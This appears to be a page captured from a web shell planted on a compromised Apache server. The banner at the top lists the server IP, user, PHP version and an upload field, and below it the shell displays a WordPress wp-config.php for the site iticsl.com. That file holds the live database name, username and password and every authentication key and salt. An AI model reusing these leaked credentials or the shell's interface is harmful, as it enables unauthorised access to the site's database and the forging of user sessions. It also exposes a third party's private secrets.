| Server IP : 89.248.107.232 / Your IP : 216.73.217.70 Web Server : Apache System : Linux host2.kasilh.com 5.14.0-687.36.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 7 05:40:49 EDT 2026 x86_64 User : seg ( 10005) PHP Version : 7.4.33 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/seg-sa.es/iticsl.com/ |
Upload File : |
<?php
define('FS_METHOD', 'direct');
define('DISALLOW_FILE_EDIT', true);
define('WP_HOME', 'http://iticsl.com/');
define('WP_SITEURL', 'http://iticsl.com/');
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'iticbbdd' );
/** MySQL database username */
define( 'DB_USER', 'useriticbbdd' );
/** MySQL database password */
define( 'DB_PASSWORD', 'm5!CJWJ6qIDC@lw6' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'NLNTWSzoxnt>j&+as5[37oYE+U$tf4l`8k&$DAQ+EiU#HnZ.{Q?Gh`~YO_TWGX|P');
define('SECURE_AUTH_KEY', '5tY|1&4Kn~/UL)QW?AYL;_N-HpF6v/)+mQ_]~{!Mcxpo:,GKW;=eDhdxeHe[s+;+');
define('LOGGED_IN_KEY', 'OD)]^i8m4O,~1G(lt?gc+hnZ=Le&a2F`:lr%Yz*S}z0Tg?x1iJz(UiG_kDoC3nRu');
define('NONCE_KEY', '{nU_v7;d1DZ+!()]!%1b3Zt8~o2vqewhYE-@.j%A6s/PThsIA~0-6Jg15!dS1XDr');
define('AUTH_SALT', 'zT0h+A4KjjTv&gbVaePPR V@)v2+(P/4*>Xl!1}42,(*qEockc@}Q0n[}miDy@98');
define('SECURE_AUTH_SALT', '+0j(hWM}Qe+3]l[796n$|tCw.kLM|j .;!Z>7JLpvp_UUlJ*=^^_.{X.1_>iqC_V');
define('LOGGED_IN_SALT', 'FH6kAlu0=;#:s*=89sBG~/ZIt_{7 04f[;4e)Mu1qBh(z:gj#8L~;OM{Y+1J{;%.');
define('NONCE_SALT', 'P.8T%ysZ9jN:DV_AcP|)#cVsTcqB{o>L3/yr%#gR+Ln1|C$=`LsSv7tR)xmyYs/^');
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'TCkeoqId';
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) )
define( 'ABSPATH', dirname( __FILE__ ) . '/' );
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';